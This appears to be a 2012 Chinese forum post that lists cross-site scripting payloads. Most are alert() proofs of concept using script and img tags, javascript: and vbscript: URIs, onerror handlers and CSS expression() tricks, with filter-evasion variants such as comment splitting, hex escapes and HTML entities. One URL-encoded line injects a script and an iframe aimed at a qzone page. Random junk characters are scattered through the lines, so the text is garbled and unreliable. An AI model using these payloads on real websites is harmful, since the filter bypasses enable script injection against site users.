<script>alert("跨站")</script> (最常用)
) \7 v& S6 Y* f$ f) `8 o<img scr=javascript:alert("跨站")></img>
& Z0 u3 A( U+ [) F' Z9 h! f<img scr="javascript: alert(/跨站/)></img>
1 U# [' g8 r. a0 g<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)% ^# k9 ` l- J1 J
<img scr="#" onerror=alert(/跨站/)></img>7 N0 m9 t6 a" {9 T& U0 ~4 w
<img scr="#" style="xss:expression(alert(/xss/));"></img> m; g, G& f" E2 h" _8 ]2 {9 \
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)9 K* j0 q( `# q2 ]+ a# o# X
<img src=vbscript:msgbox ("xss")></img>
. ~% v R, Z- j' X5 v1 O9 h: k<style> input {left:expression (alert('xss'))}</style>
0 C5 h0 `. D+ S Z<div style={left:expression (alert('xss'))}></div>
. y8 L- n" {6 A9 v8 A<div style={left:exp/* */ression (alert('xss'))}></div>
+ U; h# }$ Y( ?<div style={left:\0065\0078ression (alert('xss'))}></div>7 w! ?) b C! F) U
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
2 n7 Z! s, u0 _unicode <div style="{left:expRessioN (alert('xss'))}">' i9 e" j+ Q' I- c9 @) ^' V
; _4 h- ^; e8 L0 I0 L5 O( t; E8 Y7 K"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
. ?; `! S" l8 B6 Z0 _ |
发表于 2012-9-13 17:15:04
收藏
支持
反对